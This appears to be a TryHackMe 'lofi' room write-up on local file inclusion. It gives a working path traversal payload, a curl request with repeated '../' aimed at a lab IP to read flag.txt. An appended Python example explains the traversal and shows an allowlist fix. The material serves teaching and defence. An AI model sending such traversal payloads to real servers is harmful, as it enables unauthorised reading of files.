https://tryhackme.com/room/lofi

Keyword: LFI, File Inclusion

Looking at the source code of the challenge, I saw paths to other PHP pages:

<!-- Categories Widget -->
<div class="card my-4">
    <h5 class="card-header">Discography</h5>
    <div class="card-body">
        <div class="row">
            <div class="col-lg-6">
                <ul class="list-unstyled mb-0">
                    <li><a href="/?page=relax.php">Relax</a></li>
                    <li><a href="/?page=sleep.php">Sleep</a></li>
                    <li><a href="/?page=chill.php">Chill</a></li>
                    <li><a href="/?page=coffee.php">Coffee</a></li>
                    <li><a href="/?page=vibe.php">Vibe</a></li>
                    <li><a href="/?page=game.php">Game</a></li>
                </ul>
            </div>
        </div>
    </div>
</div>

So my thought is very, very simple: how about going up to the parent folder (../), then to its parent folder, and so on up to root? (Don't worry about how many ../ there are; the parent folder of the root folder is, of course, the root folder.)

So my payload is:

curl '10.10.253.144/?page=../../../../../../flag.txt'

Just that.
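
Why the number of ../ does not matter, and how a handler can refuse the request, as an added example that is not part of the original writeup or the room's code. It assumes the server joins ?page= onto a document root of /var/www/html (the root path and all function names are assumptions); the page names are the ones linked in the HTML above.

```python
import posixpath

WEB_ROOT = "/var/www/html"  # assumed document root, not stated in the writeup
ALLOWED_PAGES = {"relax.php", "sleep.php", "chill.php",
                 "coffee.php", "vibe.php", "game.php"}  # from the page's links


def naive_target(page, root=WEB_ROOT):
    """Path reached when ?page= is joined to the web root without checks."""
    # normpath collapses ".." lexically, the same way path lookup treats it:
    # the parent of "/" is "/", so surplus "../" segments are absorbed.
    # An absolute value for page replaces root entirely (join semantics).
    return posixpath.normpath(posixpath.join(root, page))


def is_contained(target, root=WEB_ROOT):
    """True only if target is root itself or lies below it."""
    return posixpath.commonpath([root, target]) == root


def safe_target(page, root=WEB_ROOT):
    """Return the file to include, or None when the request must be refused."""
    # 1. Allowlist: only names the site actually links to.
    if page not in ALLOWED_PAGES:
        return None
    # 2. Containment as defence in depth, in case the allowlist grows to
    #    include subdirectories. On a real filesystem, resolve symlinks
    #    (os.path.realpath) before this comparison.
    target = naive_target(page, root)
    return target if is_contained(target, root) else None


if __name__ == "__main__":
    # Constructed inputs: 3 and 6 levels of "../" land on the same file.
    for page in ("relax.php", "../../../flag.txt",
                 "../../../../../../flag.txt", "/etc/hostname"):
        print(f"{page!r:32} naive={naive_target(page)!r:28} "
              f"safe={safe_target(page)!r}")
```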